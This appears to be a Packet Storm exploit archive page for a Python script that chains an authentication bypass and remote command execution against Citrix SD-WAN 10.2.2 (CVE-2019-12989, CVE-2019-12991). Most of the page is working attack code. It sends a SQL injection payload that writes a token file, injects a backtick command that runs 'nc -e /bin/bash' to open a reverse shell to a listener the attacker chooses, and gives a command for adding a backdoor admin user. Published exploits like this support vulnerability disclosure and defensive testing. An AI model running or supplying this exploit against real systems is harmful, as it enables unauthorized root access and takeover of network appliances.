exploit the possibilities

Citrix SD-WAN Appliance 10.2.2 Authentication Bypass / Remote Command Execution

Citrix SD-WAN Appliance 10.2.2 Authentication Bypass / Remote Command Execution
Posted Jul 15, 2019
Authored by Chris Lyne

Citrix SD-WAN Appliance version 10.2.2 suffers from authentication bypass and remote command execution vulnerabilities.

tags | exploit, remote, vulnerability, bypass
advisories | CVE-2019-12989, CVE-2019-12991
MD5 | 1c552352db4cb01f5841843a21926509

Citrix SD-WAN Appliance 10.2.2 Authentication Bypass / Remote Command Execution

Change Mirror Download
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener

import requests, urllib
import sys, os, argparse
import random
from OpenSSL import crypto
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

TIMEOUT = 10 # sec

def err_and_exit(msg):
print '\n\nERROR: ' + msg + '\n\n'
sys.exit(1)

# CVE-2019-12989
# auth bypass via file write
def do_sql_injection(base_url):
url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download'
headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' }
token = random.randint(10000, 99999)
json = {
"get_package_file": {
"site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#",
"appliance_type" : "primary",
"package_type" : "active"
}
}

try:
r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
return None

# error is expected
expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"}
if (r.status_code == 400 and r.json() == expected):
return token
else:
return None

# CVE-2019-12991
# spawns a reverse shell
def do_cmd_injection(base_url, token, ncip, ncport):
cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) #
url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd)
success = False
try:
r = requests.get(url, verify=False, timeout=TIMEOUT)
except requests.exceptions.ReadTimeout:
success = True

# a timeout is success. it means we should have a shell
return success

##### MAIN #####

desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution'
arg_parser = argparse.ArgumentParser(description=desc)
arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)')
arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP')
arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)')

args = arg_parser.parse_args()

print "Starting... be patient. This takes a sec."

# Path to target app
base_url = 'https://' + args.t

# do sql injection to get a swc-token for auth bypass
token = do_sql_injection(base_url)
if (token is None):
err_and_exit('SQL injection failed.')

print 'SQL injection successful! Your swc-token is ' + str(token) + '.'

# if this worked, do the command injection
# create a new admin user and spawn a reverse shell
success = do_cmd_injection(base_url, token, args.ncip, args.ncport)

if success is False:
err_and_exit('Not so sure command injection worked. Expected a timeout.')

print 'Seems like command injection succeeded.'
print 'Check for your shell!\n'
print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1'

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close